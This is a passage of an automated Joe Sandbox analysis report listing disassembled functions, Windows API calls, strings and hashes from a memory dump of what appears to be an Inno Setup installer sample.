                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FocusMessageStateTextWaitWindow
                                                                                                      • String ID: Wnd=$%x
                                                                                                      • API String ID: 1381870634-2927251529
                                                                                                      • Opcode ID: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                                      • Instruction ID: f17a5035e7dee30901ec9a03c3a5a372f1d0714b29ccd98a4f066b2945bd060b
                                                                                                      • Opcode Fuzzy Hash: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                                      • Instruction Fuzzy Hash: CE11C634A40244AFD704EF65DC49A9EBBF8EB49314F6184BFF409E7681DB386D00CA69
                                                                                                      APIs
                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E618
                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E627
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Time$File$LocalSystem
                                                                                                      • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                                      • API String ID: 1748579591-1013271723
                                                                                                      • Opcode ID: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                                      • Instruction ID: 5dd65cae4c1adac9d47cc9ad6336eda1851498fedff4a8a979bd050f9c4a6815
                                                                                                      • Opcode Fuzzy Hash: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                                      • Instruction Fuzzy Hash: A81136A440C3909ED340DF2AC04432BBAE4AB99704F44892EF8C8C6381E779C848DBB7
                                                                                                      APIs
                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F83
                                                                                                        • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                                      • MoveFileA.KERNEL32(00000000,00000000), ref: 00453FA8
                                                                                                        • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$AttributesDeleteErrorLastMove
                                                                                                      • String ID: DeleteFile$MoveFile
                                                                                                      • API String ID: 3024442154-139070271
                                                                                                      • Opcode ID: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                                      • Instruction ID: b5871bee3d194af1fa843ac656f6d820fc0ba16d57580c91db5694710367c43f
                                                                                                      • Opcode Fuzzy Hash: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                                      • Instruction Fuzzy Hash: AEF062716142045BD701FBA2D84266EA7ECDB8435EF60443BB900BB6C3DA3C9E094529
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen
                                                                                                      • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                                      • API String ID: 47109696-2631785700
                                                                                                      • Opcode ID: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                                                                      • Instruction ID: 1950c6f853cc10ed35e504d9d8503a730f6ffd27dc9bba4e9fa27fab35675349
                                                                                                      • Opcode Fuzzy Hash: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                                                                      • Instruction Fuzzy Hash: 12F0AF31300110DBCB10EB9AD885B6F6299DB9931AF50503BF981DB293E73CCC168629
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                      • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C05
                                                                                                      • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C28
                                                                                                      Strings
                                                                                                      • CSDVersion, xrefs: 00483BFC
                                                                                                      • System\CurrentControlSet\Control\Windows, xrefs: 00483BD2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                      • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                                      • API String ID: 3677997916-1910633163
                                                                                                      • Opcode ID: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                                      • Instruction ID: 1d850e848a14c5c59b8e95f13e5f63a8fb365af486cc5d6c9f9b701d22fca986
                                                                                                      • Opcode Fuzzy Hash: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                                      • Instruction Fuzzy Hash: 56F03176E40208A6DF10EAD48C45BAFB3BCAB14B05F104967EA10F7280E678AB048B59
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                                      • API String ID: 1646373207-4063490227
                                                                                                      • Opcode ID: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                                      • Instruction ID: 657275fb9dfacbe144619f02b172540cf2f0c5a6f4252bec6bd03a25d2dd35a2
                                                                                                      • Opcode Fuzzy Hash: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                                      • Instruction Fuzzy Hash: A5E0DFE0B40B0122D70032BA1C82B6B108D4B84728F90053B3894E62D6DDBCD9840A6D
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAD0), ref: 0042EB62
                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB68
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                                      • API String ID: 1646373207-260599015
                                                                                                      • Opcode ID: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                                      • Instruction ID: e1ec077e445c8734ae54db5ffdd633522f5c412f0b7fee52e54de0d29bb4c321
                                                                                                      • Opcode Fuzzy Hash: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                                      • Instruction Fuzzy Hash: A2D0C793311732665D10B1F73CD1EAB058C891527935404B7F515E5641D55DEC1115AD
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: NotifyWinEvent$user32.dll
                                                                                                      • API String ID: 1646373207-597752486
                                                                                                      • Opcode ID: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                                      • Instruction ID: 5e946f17392c81a4f172a46fe169fb9a1f72c9003761a5edf28bd31acc2f1150
                                                                                                      • Opcode Fuzzy Hash: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                                      • Instruction Fuzzy Hash: 59E012F0E417049AFF00BBB57B86B1A3A90E764719B00057FF414A6292DB7C481C4F9D
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                                      • API String ID: 1646373207-834958232
                                                                                                      • Opcode ID: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                                      • Instruction ID: 34f838485a85c0df890c3e192e44216071158a5cea444d63bbc0a0b2480586ef
                                                                                                      • Opcode Fuzzy Hash: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                                      • Instruction Fuzzy Hash: 22B002C0651707589D5032FA0D06B3F48484C5276D728057F3414A51C6DD6C89115D3F
                                                                                                      APIs
                                                                                                        • Part of subcall function 0044B658: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                                        • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                                      • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                                      • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                      • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                      • API String ID: 2238633743-2683653824
                                                                                                      • Opcode ID: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                                      • Instruction ID: ed4894befccbfeda2ad80f7d1b9e1cb4df1a551eae9986247d0c145e26b1cd95
                                                                                                      • Opcode Fuzzy Hash: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                                      • Instruction Fuzzy Hash: DDB092D0A82740A4C90077F2985B90F2A4488A271EB10153B710476483EABC84100EAE
                                                                                                      APIs
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54), ref: 0047D7CC
                                                                                                      • FindClose.KERNEL32(000000FF,0047D7F7,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54,00000000), ref: 0047D7EA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$CloseFileNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 2066263336-0
                                                                                                      • Opcode ID: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                                      • Instruction ID: 2ce97de6e4eb512f8d4c2eb376340b964b0e691095a652a34be041e4083b4e02
                                                                                                      • Opcode Fuzzy Hash: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                                      • Instruction Fuzzy Hash: 07813A74D0024D9FCF11EFA5CC91ADFBBB8EF49304F5080AAE908A7291D6399A46CF54
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042EE30: GetTickCount.KERNEL32 ref: 0042EE36
                                                                                                        • Part of subcall function 0042EC88: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECBD
                                                                                                      • GetLastError.KERNEL32(00000000,00475721,?,?,0049C1E0,00000000), ref: 0047560A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CountErrorFileLastMoveTick
                                                                                                      • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                                      • API String ID: 2406187244-2685451598
                                                                                                      • Opcode ID: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                                      • Instruction ID: cfe7f312216358cbd0971b398f0cafde252de4893b1317a5ce8d70824cf78b76
                                                                                                      • Opcode Fuzzy Hash: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                                      • Instruction Fuzzy Hash: 4D418570A006099BDB10EFA5D882AEF77B5FF48314F508537E408BB395D7789A058BA9
                                                                                                      APIs
                                                                                                      • GetDesktopWindow.USER32 ref: 00413D46
                                                                                                      • GetDesktopWindow.USER32 ref: 00413DFE
                                                                                                        • Part of subcall function 00418EC0: 6FBCC6F0.COMCTL32(?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EDC
                                                                                                        • Part of subcall function 00418EC0: ShowCursor.USER32(00000001,?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EF9
                                                                                                      • SetCursor.USER32(00000000,?,?,?,?,00413AF3,00000000,00413B06), ref: 00413E3C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CursorDesktopWindow$Show
                                                                                                      • String ID:
                                                                                                      • API String ID: 2074268717-0
                                                                                                      • Opcode ID: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                                      • Instruction ID: d0219f8535474b9b7e790bb207accfb6dce16a9ac66decbe361331da1304c66b
                                                                                                      • Opcode Fuzzy Hash: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                                      • Instruction Fuzzy Hash: 91412C75600210AFC710DF2AFA84B56B7E1EB65329B16817BE405CB365DB38DD81CF98
                                                                                                      APIs
                                                                                                      • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A75
                                                                                                      • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AE4
                                                                                                      • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B7F
                                                                                                      • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BBE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LoadString$FileMessageModuleName
                                                                                                      • String ID:
                                                                                                      • API String ID: 704749118-0
                                                                                                      • Opcode ID: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                                      • Instruction ID: 7d65b0a5aa49ad722f3f3263bbe29e3330acee4661d9e2153cfe083702b22da2
                                                                                                      • Opcode Fuzzy Hash: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                                      • Instruction Fuzzy Hash: 1F3123716083849AD370EB65C945BDF77D89B85704F40483FB6C8E72D1EB7859048B6B
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E90D
                                                                                                        • Part of subcall function 0044CF50: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF82
                                                                                                      • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E991
                                                                                                        • Part of subcall function 0042BBB4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC8
                                                                                                      • IsRectEmpty.USER32(?), ref: 0044E953
                                                                                                      • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E976
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
